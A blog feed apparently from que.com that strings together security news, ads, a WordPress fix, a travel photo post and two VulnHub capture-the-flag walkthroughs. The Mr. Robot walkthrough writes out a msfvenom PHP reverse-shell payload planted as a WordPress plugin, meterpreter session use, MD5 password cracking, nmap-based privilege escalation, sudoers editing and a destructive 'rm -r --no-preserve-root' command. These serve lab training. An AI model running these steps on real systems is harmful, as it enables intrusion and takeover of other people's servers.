Vault 7: CIA Hacking Tools Revealed | Wikileaks

If you're in Cyber Security business, you will be a lot busier for days to come securing your network and your customers. Wikileaks revealed CIA Hacking Tools.
Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency.
The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virgina. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election.
Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

KING of Tanks - MultiPlayer Games

Welcome to KING of Tanks Multiplayer Game – Que.com latest game. 
kingoftanks-com-01
This will be our reference project for future KING of Tanks multiplayer game improvement. We hope you enjoy playing games with us. Keep in mind this game is FREE you don't have to pay to play.
Things to remember, you can easily come back to this page by going to the following links for quick access. We want you bookmark this page :).
continue reading at KING of Tanks Multiplayer Game web page for more information.

KING.NET Email Address

Manage your business, not your E-mail. We provides reliable uptime, global scalability, and world class security powered by Google Apps. Doing business in the computing cloud means you’re always current – no more maintenance, upgrades, security patches or hassles. You can re-allocate your in-house IT to other productive projects.
Got your email @KING.NET? Please go to http://mail.king.net to login to your email address, password and your pin. For your email security, it is highly recommended that you enable the Two-Factor Authentication to access your email.
Your email is accessible using the following:
  • Any modern internet browser e.g. Internet Explorer (IE), Google Chrome, Mozilla Firefox, Safari and others.
  • Smart Phones e.g. iPhone, Android, etc.
Examples of Email Addresses to register: Please note email address @KING.NET is a premium identity for very important person like yourself. You can only get your own email @KING.NEt here. Some example of premium email address using @KING.NET
  • Saudi@King.net
  • Charles@King.net
  • Royal@King.net
  • James@King.net
  • Peter@King.net
  • and of course your own Name@KING.NET

Enable Two-Factor Authentication to protect your Email Account.

Retune.com - Email Security
Retune.com - Email Security
Your email address is the center of your security world. It is highly recommended that you enable Two-Factor Authentication to minimize risk of someone accessing your email through spear phishing attack, discover caches of passwords in your mailbox, and other related email attack. As an example, the attacker of DNC email uses a simple password reset request through spear phishing attack, was able to gain access to the email and password. If the Two-Factor Authentication is enabled, it will require another layer of security through verification code and stop it.



Two-Factor Authentication or 2-Step Verification adds an extra layer of security to your email account by requiring you to enter a verification code in addition to your username and password when signing into your email account. It help protect a user's account from unauthorized access should someone manage to obtain their password. Even if a password is cracked, guessed, or otherwise stolen, an attacker can't sign in without access to the user's additional verification. This verification can be in the form of codes which only the user can obtain via their own mobile phone.

Requirement. To use Two-Factor Authentication you need to have a mobile phone that can receive the verification code via text message or phone call. Other devices use the Google Authenticator mobile app to generate the verification code.

How to enable Two-Factor Authentication?
Retune.com - Cyber Security
Retune.com - Cyber Security
Using Gmail or white label domain name.
  • Login to your email, go to https://www.gmail.com, enter your email address and password.
  • Click your name icon (upper right corner), then click My Account
Google provided a detailed step-by-step procedure on how to enable it. You will see Security Checkup, click on Get Started and follow the steps.
  1. Check your recovery information.
  2. Check your connected devices
  3. Check your account permissions
  4. Check your app password. This is to create password for your MS Outlook or other email reader application.
  5. Check your Two-Factor settings

Have a safe computing experience.

Source: Que.com

FIXED. Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837

The latest version of WordPress is v4.7. It is always recommended to upgrade to the latest released to minimize vulnerabilities (exposure) and improve use of content management service.
Always backup before you upgrade, copy your WordPress files and download the database. This will give us way to roll-back just in case we run into "unknown" issue. It is not always perfect when you upgrade.
During my upgrade to v4.7 to one of my customer website. I've got this error.
Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837
A quick fix is to re-upload the plugin.php file from my old backup to the /wp-includes folder. This works!
But I want to use the latest plugin.php file not the old copy. Searching the internet trying to find out if anyone has encounter the same error when upgrading to the latest version of wordpress. No surprise! It is already been discussed, issue and alternative solutions to fix it.
I found the solution. I disabled this file "/wp-content/object-cache.php" by renaming it to object-cache.DISABLED.php or deleting will work as well. I don't know the use of this file at this point.
I re-uploaded the latest plugin.php to /wp-includes/ folder. Tested my website and happy with the result. 
I hope this help.
Source: Que.com

A new phishing attack targeting Office 365 business email users - EM @QUE.com

A new phishing attack targeting Office 365 business email users was found using Punycode to go undetected by both Microsoft’s default security and desktop email filters, Avanan security researchers warn.
The attack is meant to steal Office 365 credentials and abuses a vulnerability in how Office 365 anti-phishing and URL reputation security layers deal with Punycode. The attack starts with fake FedEX email that include benign looking URLs meant to take users to malicious website. See image below.
office-365-business-users-targeted-in-punycode-based-phishing
By using Punycode and leveraging said flaw in the phish-detection engine, the URL actually resolves to two different domains, one safe, which is detected by Office 365, and the other malicious, which is followed by the browser.
The underlining issue is that Office 365’s default security treats the domain as plain ASCII when verifying whether it is legitimate or not. Because all modern browsers support Unicode character, the address is translated to its Unicode format when launched in the browser. This address is malicious and presents users with a fake Office 365 login page in an attempt to steal user credentials.
How to protect against phishing email or spear phishing email intended for the big fish in our organization?
  • Do not click in any links asking you to reset your password. Make it as a habit, never click on a link from your email :)
  • Use Two-Factor Authentication. I highly recommend that you use Two-Factor authentication when available, for your bank accounts, social networks e.g. LinkedIn, Facebook, etc. (The Two-Factor authentication is not available to Kiosk Email user.)
The Phishing Email is the same old method used when a malicious person, asking you to change your bank account password, compromised bank accounts, deposited money on your bank, UPS delivery, social media accounts, free Redskins ticket, free Washington Wizards tickets, and many other variations of fake email. According to PhishMe91% of CyberAttacks start with a Phishing Email. The hacked incidents of high profile staff at DNC is through phishing emails. Using this method is cheap, hard to detect, and easy to deploy.
Security awareness of everyone is important to minimize our exposure.
What is the worst case scenario if you click on a “bait” links?
  • The malicious user will have access to your account. For example, your email, social media, banks account, etc.
  • Or The malicious user will have full control of your computer through “reverse shell” access. Where they can see all files, install a back-door program to get back in, use your webcam, use your computer as bot for DDOS attack, anything they want.
What to do if you accidentally click a “bait” links?
  • When you click on a “bait” link or a bad attachment, you think nothing happen and move on with your routine tasks. But the malicious code is already executed in the background, you will not notice it that’s how it is design. Don’t ignore this simple mistake, reboot your workstation right away, this will end the session initiated by clicking the bad link.
  • Scan your workstation using your anti-virus/anti-malware software.
  • Report to your immediate supervisor or post in our comment below. Our community is willing to help.
The Center for Development of Security Excellence (CDSE.edu) website provides a fun way to test your awareness against Phishing Scams. Go to http://www.cdse.edu/shorts/cybersecurity.html# website, check the Phishing Scams video “Phishing Scams Avoid the Bait” and have fun.
Reference links:

CTF – Hacking Mr. Robot by EM @QUE.com

Another learning experience to improve my penetration testing skills by hacking Mr. Robot virtual machine as my target machine.
My private network for this penetration testing exercise.
  • Kali Linux, my tool to exploit the target machine. IP Address 192.168.159.131
  • Mr.Robot, my target machine. IP Address: Unknown
que-com-mr-robotLet's begin. My objective is to find the three hidden keys.
Sponsored by Termed.com Life Insurance.
I have no knowledge of my target machine (Mr. Robot) IP Address, so let me begin running nmap tool. Of course, you can also use other network discovery tool to scan your network. I prefer nmap tool, it is available to my pentest machine.
root@kali:~# nmap -T4 192.168.159.0/24
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 10:41 EST
Nmap scan report for 192.168.159.131
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:F8:73:37 (VMware)
Nmap scan report for 192.168.159.254
Host is up (0.00015s latency).
All 1000 scanned ports on 192.168.231.254 are filtered
MAC Address: 00:50:56:F4:2B:CA (VMware)
Nmap scan report for 192.168.159.130
Host is up (0.0000050s latency).
All 1000 scanned ports on 192.168.159.131 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 39.00 seconds
root@kali:~#
I discovered my target machine IP address 192.168.159.130 and open ports. That's a basic enumeration, scanning my private network.
Port 80 and 443 are interesting ports to start poking around. Let's see what's on this website. I'm calling firefox program direct from the command prompt, of course you can simply click on the Firefox icon and enter the IP Address of the web server. It's cool to use CLI to run a command.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/
The website started loading a javascript, looks like loading a linux environment.
que-com-ctp-mr-robot-webpage
Opening the source code, got this fancy "Your are not alone".
que-com-ctp-mr-robot-webpage-javascript
Checking to see if I can use any of this information to hack Mr.Robot box.
Nothing so far. I will come back to this webpage later on.
Let's try using "dirbuster" to know our target website.
root@kali:~/KING.NET/mr.robot# dirb http://192.168.159.130/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 30 19:18:31 2016
URL_BASE: http://192.168.159.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.159.130/ ----
==> DIRECTORY: http://192.168.159.130/0/
==> DIRECTORY: http://192.168.159.130/admin/
+ http://192.168.159.130/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.159.130/audio/
==> DIRECTORY: http://192.168.159.130/blog/
==> DIRECTORY: http://192.168.159.130/css/
+ http://192.168.159.130/dashboard (CODE:302|SIZE:0)
+ http://192.168.159.130/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/feed/
==> DIRECTORY: http://192.168.159.130/image/
==> DIRECTORY: http://192.168.159.130/Image/
==> DIRECTORY: http://192.168.159.130/images/
+ http://192.168.159.130/index.html (CODE:200|SIZE:1077)
+ http://192.168.159.130/index.php (CODE:301|SIZE:0)
+ http://192.168.159.130/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.159.130/js/
http://192.168.159.130/license (CODE:200|SIZE:309)
http://192.168.159.130/login (CODE:302|SIZE:0)
+ http://192.168.159.130/page1 (CODE:301|SIZE:0)
+ http://192.168.159.130/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.159.130/rdf (CODE:301|SIZE:0)
+ http://192.168.159.130/readme (CODE:200|SIZE:64)
http://192.168.159.130/robots (CODE:200|SIZE:41)
http://192.168.159.130/robots.txt (CODE:200|SIZE:41)
+ http://192.168.159.130/rss (CODE:301|SIZE:0)
+ http://192.168.159.130/rss2 (CODE:301|SIZE:0)
+ http://192.168.159.130/sitemap (CODE:200|SIZE:0)
http://192.168.159.130/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/video/
==> DIRECTORY: http://192.168.159.130/wp-admin/
+ http://192.168.159.130/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-content/
+ http://192.168.159.130/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-includes/
+ http://192.168.159.130/wp-links-opml (CODE:200|SIZE:227)
+ http://192.168.159.130/wp-load (CODE:200|SIZE:0)
http://192.168.159.130/wp-login (CODE:200|SIZE:2627)
--- snip --- dirbuster still running.
I have to cancel it. I think I have enough information to start digging. There are so much information from this dir results. Getting to know of some sub-folders e.g. /admin, /blog, /license, /phyadmin, /wp-admin, /wp-login, /wp-config, etc. I think Mr.Robot box website is using a WordPress content management system. Nice.
Checking the following sub-folder.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/license
A webpage with this content "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"
Sponsored by Termed.com Life Insurance.
Continue to scroll down 'till the end of the page to see this text "
do you want a password or something?" and this code.
ZWxsaW90OkVSMjgtMDY1Mgo=
Copied to nano and save as 1stdump.txt to check for base64. Run base64 -d -i 1stdump.txt
root@kali:~/KING.NET/mr.robot# nano 1stdump.txt
root@kali:~/KING.NET/mr.robot# base64 -d -i 1stdump.txt
elliot:ER28-0652
root@kali:~/KING.NET/mr.robot#
Look like we have elliot:ER28-0652 username and maybe a password. Let's try to login to Mr.Robot virtual machine and if this account information work.
No luck! Continue hacking the box :(.
Let me try using this account here, http://192.168.159.130/wp-admin. It's a success!
que-com-ctp-mr-robot-wordpress
Checking the user, "elliot" username is also the Administrator. Jackpot! And another user micho05654 role as subcriber. I will ignore this subscriber user, and focus to elliot as administrator.
que-com-ctp-mr-robot-wordpress-admin
Now, I can control this box from here. Exploiting the WordPress CMS since I have an Administrator rights through a reverse shell. Let Kali virtual machine do the work for us. Click on Applications, Exploitation Tools, then click MSF Payload. It will open the MSFVenom Payload Creator in a new terminal window. I run the command below.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
This command interpret to run msfpc payload create using type php, the IP address e.g. 192.168.159.131 of the attacker using port 433, using msf for cross platform shell gaining full power of metasploit, reverse to make the target connect back to the attacker in a complete stand alone payload (stageless), using tcp standard method of connecting back. I hope that make sense to you, otherwise type --help for more details.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
[*] Msfvenom Payload Creator (MPC v1.4.3)
[i] IP: 192.168.159.131
[i] PORT: 443
[i] TYPE: php (php/meterpreter_reverse_tcp)
[i] CMD: msfvenom -p php/meterpreter_reverse_tcp -f raw \
--platform php -e generic/none -a php LHOST=192.168.159.131 LPORT=443 \
> '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] php meterpreter created: '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] MSF handler file: '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[i] Run: msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
[*] Done!
After running the MSFVenom Payload Creator, the program generated two files:
  1. php-meterpreter-stageless-reverse-tcp-443.php
  2. php-meterpreter-stageless-reverse-tcp-443-php.rc
And the command to run "msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'". All ready for me to execute.
root@kali:~# msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
My listening (attacker) machine ready and waiting for connection.
resource (/root/php-meterpreter-stageless-reverse-tcp-443-php.rc)> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.159.131:443
[*] Starting the payload handler...
msf exploit(handler) >
The MSFVenom Payload Creator also provided a website that I can use to exploit my target e.g. python -m SimpleHTTPServer 8080. But in this scenario, I will not use it because I already have administrator access to the WordPress site. All I need to do is install my payload through WordPress as plugin. At this point, I can create havoc to the WordPress installation by deleting contents but the main goal is to own the box (pwn to root or pwn 2 r00t).
I will edit the php file with additional information so I can use it as WordPress plugin. Here's the updated php file.
/*
Plugin Name: Pwn-to-Root
Plugin URI: http://www.king.net
Description: A demo using WordPress to establish a reverse shell.
Author: EM @ KING.NET
Version: v1.0
Author URI: http://www.king.net
*/
//<?php if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset$
Then zip the php file.
root@kali:~# zip php-meterpreter-stageless-reverse-tcp-443.zip php-meterpreter-stageless-reverse-tcp-443.php
adding: php-meterpreter-stageless-reverse-tcp-443.php (deflated 76%)
root@kali:~#
The payload is now ready. I can use the zip file to upload as plugin in WordPress management console. Let's go back to the WordPress admin page. In Plugin, click add new plugin, then upload the zip file. Browse the zip file, click Install Now. Wait to complete the upload.
que-com-ctp-mr-robot-wordpress-activateplugin
I've already started the listening machine (above), so all I need to do is click Activate Plugin to create the reverse access. When I check my listening machine, I see our session.
[*] Meterpreter session 1 opened (192.168.159.131:443 -> 192.168.159.130:39959) at 2016-12-03 23:39:58 -0500
From the listening machine, type help to check all available commands.
msf exploit(handler) > help sessions
Type "sessions"
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux daemon (1) @ linux 192.168.159.131:443 -> 192.168.159.130:39959 (192.168.159.130)
msf exploit(handler) >
Type "help sessions" to see options on how to connect using sessions.
msf exploit(handler) > help sessions
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
Now, I can connect to session id 1 using -i option for Interact with supplied session ID
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We are now in session. From here I can use local commands using Mr.Robot machine  e.g. ls, pwd
meterpreter > pwd
---snip --
00644/rw-r--r-- 19642 fil 2015-09-16 06:49:06 -0400 user-new.php
100644/rw-r--r-- 16552 fil 2015-09-16 06:49:06 -0400 users.php
100644/rw-r--r-- 16143 fil 2015-09-16 06:49:06 -0400 widgets.php
meterpreter > pwd
/opt/bitnami/apps/wordpress/htdocs/wp-admin
meterpreter >
Let me check the home directory.
meterpreter > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
I see robot directory, continue digging ...
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
meterpreter > cd robot
meterpreter > ls
Listing: /home/robot
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
meterpreter >
In /home/robot directory, two files found
  1. key-2-of-3.txt
  2. password.raw-md5
I can't access the "key-2-of-3.txt"  file because it is only available (r--------) owner, e.g. user "robot". See error below, but "password.raw-md5" is available (rw-r--r--)
meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
meterpreter >
The "robot:c3fcd3d76192e4007dfb496cca67e13b" stands for username:password. I've used online MD5 decryter tool (hashkiller.co.uk) to produce the value of "c3fcd3d76192e4007dfb496cca67e13b" to "abcdefghijklmnopqrstuvwxyz". Wow! the password is so basic. If I run a password cracker earlier, I'm sure I can get this password in under 2 minutes. Anyway, let me login to Mr.Robot box using this username (robot) and password (abcdefghijklmnopqrstuvwxyz).
que-com-ctp-mr-robot-boxaccess
Successfully login as robot and (abcdefghijklmnopqrstuvwxyz). Run ls command to check directory listing.
que-com-ctp-mr-robot-list
Run "cat key-2-of-3.txt" to view the file.
que-com-ctp-mr-robot-key2
Check if I can "ls /root"
que-com-ctp-mr-robot-list-root
Oops ... it seems more research for me to get the root access.
After long hours of research and reading other penetration testing website/blogs...
I checked Mr.Robot box nmap version.
que-com-ctp-mr-robot-nmap
I can use "nmap --interactive" using !bash to runs shell command.
que-com-ctp-mr-robot-nmap-bash
No luck.
Now, trying !sh to runs shell command. Type "exit" to get out of bash command.
que-com-ctp-mr-robot-nmap-sh-key3
It's a success using !sh command. Checking /root/firstboot_done it's empty, and /root/key-3-of-3.txt produce our key "04787ddef27c3dee1ee161b21670b4e4".
At this time. I discovered 2 out of 3 keys as listed below.
  1. key-1-of-3.txt - ?
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".
What's next after getting root access? I'm not done yet, my user "robot" still a standard account. I can escalate the privilege of user "robot" to "root" through editing sudoers file to add "robot ALL=(ALL) ALL". Type nano /etc/sudoers to add "robot ALL=(ALL) ALL".
que-com-ctp-mr-robot-nano-sudoers
Save it. Exit !sh command, quit nmap, run sudo ls, then enter the robot password. If everything goes well, I can run sudo su for super user.
que-com-ctp-mr-robot-rooted
Rooted!
Sponsored by Termed.com Life Insurance.
From here, I can do anything to Mr.Robot virtual machine. I can even delete this box by running a command "# rm -r --no-preserve-root".
I still need to find the value of key-1-of-3.txt. Going back to the website, check other sub-folders.
Checking the http://192.168.159.130/robots/ web page got nothing.
Checking the http://192.168.159.130/robots.txt file,  shows an interesting information e.g. fsocity.dic and key-1-of-3.txt. Let's download these files and investigate.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
run wget http://192.168.159.130/fsocity.dic
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/fsocity.dic
--2016-12-03 15:13:04-- http://192.168.159.130/fsocity.dic
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=======================>] 6.91M 20.0MB/s in 0.3s
2016-12-03 15:13:06 (20.0 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
The fsocity.dic is 6.91M filesize, it could be a word list.
Let me download the text file too.
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/key-1-of-3.txt
--2016-12-03 15:14:47-- http://192.168.159.130/key-1-of-3.txt
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/plain]
Saving to: ‘key-1-of-3.txt’
key-1-of-3.txt 100%[=======================>] 33 --.-KB/s in 0s
2016-12-03 15:14:47 (4.97 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
The key-1-of-3.txt filesize is only 33KB, very small.
I run cat fsocity.dic to check the content, and confirmed it is a dictionary file. I run cat key-1-of-3.txt and produce this result.
root@kali:~/KING.NET/mr.robot# cat key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Found it. key-1-of-3.txt value is "073403c8a58a1f80d943455fb30724b9"
So all keys discovered!
  1. key-1-of-3.txt "073403c8a58a1f80d943455fb30724b9"
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".

That's fun ...
Thank you for reading my walk through. I will create a follow video later this week.
And I'm still catching up to all the challenge provided by Vulnhub.com website.
Thank you,
Useful links:

Gooligan Android malware breached 1Million users

FYI Android users, you have to read this article courtesy by HelpNetSecurity.com if you're an Android smart phone user. I actually read it first from CNN website and again today.
Check Point security researchers have revealed a new variant of Android malware, breaching the security of more than one million Google accounts.
gooligan-malware

Key findings

  • The campaign infects 13,000 devices each day and is the first to root over a million devices.
  • Hundreds of email addresses are associated with enterprise accounts worldwide.
  • Gooligan targets devices on Android 4 (Jelly Bean, KitKat) and 5 (Lollipop), which represent nearly 74% of Android devices in use today.
  • After attackers gain control over the device, they generate revenue by fraudulently installing apps from Google Play and rating them on behalf of the victim.
  • Every day Gooligan installs at least 30,000 apps on breached devices, or over 2 million apps since the campaign began.
Check Point reached out to the Google security team immediately with information on this campaign. “As part of our ongoing efforts to protect users from the Ghost Push family of malware, we’ve taken numerous steps to protect our users and improve the security of the Android ecosystem overall,” stated Adrian Ludwig, Google’s director of Android security.
continue reading at Que.com website.
Sponsored by Retune.com

CTF – Hacking Necromancer

Capture The Flag - Necromancer. Practicing my penetration testing skills to hack a target machine.  Here's my test environment in my own private virtual network.
I setup my Kali Linux in host virtual network and my target machine (Necromancer) which I downloaded a OVA image from VulnHub website.
When I started my Kali Linux virtual machine, I have an assigned IP Address 192.168.231.129. This most likely a different IP address when you setup your own private network. And my target machine Necromancer IP address is 192.168.231.128. I saw this when I started the Necromancer virtual machine. This save me some time to scan all /24 within my network.
Anyway, if you still want to scan your network you can use "netdiscover" tool. If you're not sure what options to use simply run "netdiscover --help". Okay, got it? Now run # netdiscover -r 192.168.231.0/24 [Enter] to scan your private network. Here's the result of my network. I run "ifconfig" in my Kali to know the assigned IP address, then the other IP most likely for my target network.
192.168.231.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.231.128 00:0c:29:a5:8c:67 1 60 VMware, Inc.
192.168.231.129 00:50:56:f0:0a:96 1 60 VMware, Inc.
With this information I can simply run nmap to my target IP address.
que-com-ctp-necromancer
Note: IP Address renewal in 900 seconds.
Now my private network, Kali and target machine are ready. Let's begin hacking my target machine.
From Kali Linux virtual machine run # nmap 192.168.231.29 to see what I can discover.
que-com-ctp-necromancer-nmap
I found port 80 open and 1 host up. That's a good start. Let's run # nmap -sU -n -r -T4 192.168.231.128
que-com-ctp-necromancer-nmap-doom
Now it's getting interesting. I found UDP port 666 a service for doom.
Let's fire up netcat using the newly discovered UDP port 666 # nc 192.168.231.128 666 [Enter].
que-com-ctp-necromancer-netcat
Hmm. Nothing happen. I wonder what's going on in the background. One way to find out, let's run our network snipping tool wireshark. I filter the result using my target machine IP Address 192.168.231.128 and found out it is trying to connect to the destination port 4444.
que-com-ctp-necromancer-wireshark
I open another terminal window, and setup to listen using port 4444 # nc -lvp 4444 [Enter]. And re-run # nc -u 192.168.231.128 666 [Enter], then wait to see the output in listening terminal window.
This is the result.
que-com-ctp-necromancer-netcat-captureddata
My first guess, it is a base64 code. I copied the code to my dumptext.txt file. And run #base64 -d -i dumptext.txt [Enter]
Woohh. I got the first flag.
que-com-ctp-necromancer-flag1
I copied  flag1{e6078b9b1aac915d11b9fd59791030bf}  to my flags.txt file for recording purpose, just like a trophy :)
Thank you.

Weebly Breach Affects Over 43 Million Users

Hackers have managed to steal information associated with more than 43 million accounts belonging to customers of Weebly, a San Francisco-based web hosting service that provides a drag-and-drop website builder.
According to LeakedSource, the attackers stole 43,430,316 accounts after breaching the company’s systems in February. The compromised information includes usernames, email addresses, IPs and password hashes.
Weebly has been in touch with LeakedSource and confirmed that the exposed information is genuine. The company has notified affected users and reset their passwords. On its website, Weebly claims to have more than 40 million users, which indicates that the breach has affected a large majority, if not all, of its customers.
Sponsored by: LibertyTrust.com
Weebly is still trying to determine the cause of the breach, but the company says it has already started improving network security. In addition to resetting passwords, it has introduced a new feature that allows users to monitor their most recent login history for unauthorized access.
There is no evidence that Weebly users’ customers are affected and the hosting service says it does not store full credit card numbers or other financial information. Users have been warned about the risks of password reuse and the possibility that cybercriminals could leverage this incident for phishing campaigns.
Continue reading: QUE.COM Cyber Security News

The silent evolution of domain names

Interesting article to read posted at TechCrunch regarding the new gTLDs availability to register a domain name using different extensions 1000+ of them from .GURU .NINJA .anything you can think.
In my humble opinion. I think the new gTLDs are good for personal blog and website. But I will not recommend this for a business use as your primary site for online e-commerce. Why will you build your online business using anything.extensions to give free advertising to the owner of .com domain? Where you work hard to establish your online brand, spending time and money to spread the words to all the people you knew about your business.
People knows .com is a trusted website to conduct business, plain and simple to do business online. This is also the reason I rebrand from KING.NET to QUE.COM, yes it's not an easy task and not cheap too. This is why I always recommend to my clients, do it right the first time get your business a .com domain name.
I will registered other extensions to support my business, redirect it to my primary site, and use it for marketing purposes only. But never as your primary website. I hope that makes sense.
Go get your new gTLDs extensions at Moscom.com or NeedName.com.
Source: MAJ.COM

Mangrove Paddle Boat Tour in Puerto Princesa

If you are in Puerto Princesa, you've got to visit Mangrove Paddle Boat Tour.
Mangroves are very important in supporting the rich marine life in the region where smaller fishes feed and reproduce. The Mangrove Paddle Boat tour offers an educational tour by boat through Sabang's Mangrove forests.
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
Our friendly boat guide Ms. Chi
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
And our hard working boat man "Ronchi".
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
PuertoPrincesa.com – Mangrove Paddle Boat Tour. Photograph by EM@QUE.COM
Photos courtesy by EMIL@QUE.COM for PuertoPrincesa.com, check it out for more photos.